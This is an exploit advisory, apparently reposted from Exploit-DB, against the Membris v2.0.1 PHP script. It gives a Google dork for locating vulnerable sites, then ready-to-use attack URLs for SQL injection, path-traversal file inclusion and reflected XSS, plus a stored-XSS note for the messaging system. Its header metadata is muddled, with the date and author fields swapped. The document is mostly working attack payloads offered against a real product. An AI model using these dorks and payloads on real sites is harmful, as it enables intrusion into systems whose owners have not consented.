48 lines
No EOL
1.2 KiB
Text
Executable file
48 lines
No EOL
1.2 KiB
Text
Executable file
###################################
|
|
# Exploit:Membris v 2.0.1 Sql \ XSS & File Disclosure Vulnerabilities
|
|
# Google Dork: Powered by Membris v 2.0.1
|
|
# Date: Dr.abolalh
|
|
# Author:01/06/2012
|
|
# E-Mail: xa3@hotmail.com
|
|
# Software Link: http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
|
|
# Version: Membris v 2.0.1
|
|
###################################
|
|
|
|
# Exploit-DB Note:
|
|
# Application also suffers from
|
|
# stored XSS in the messaging system.
|
|
# Insert <script>alert('xss');</script>
|
|
# in the message body.
|
|
|
|
|
|
|
|
SQL:
|
|
voir-actualites.php
|
|
|
|
Exploit:
|
|
voir-actualites.php?idn=1 '
|
|
|
|
+-----------------------------------------------------------+
|
|
|
|
File Inclusion
|
|
|
|
|
|
include ("../plugins/" . $_GET['acces'] . "/fonctions.php");
|
|
|
|
Exploit:
|
|
admin/actions-plugin.php?acces=../index.php
|
|
|
|
+-----------------------------------------------------------+
|
|
|
|
XSS
|
|
search.php
|
|
|
|
Exploit:
|
|
search.php?req= XSS
|
|
|
|
search.php?req='--></style></script><script>alert(0x0002BC)</script>
|
|
+-----------------------------------------------------------+
|
|
|
|
#+--------------------------------------------------+#
|
|
#[?] Greetz to : sec4ever #
|
|
#---------------------------------------------------+# |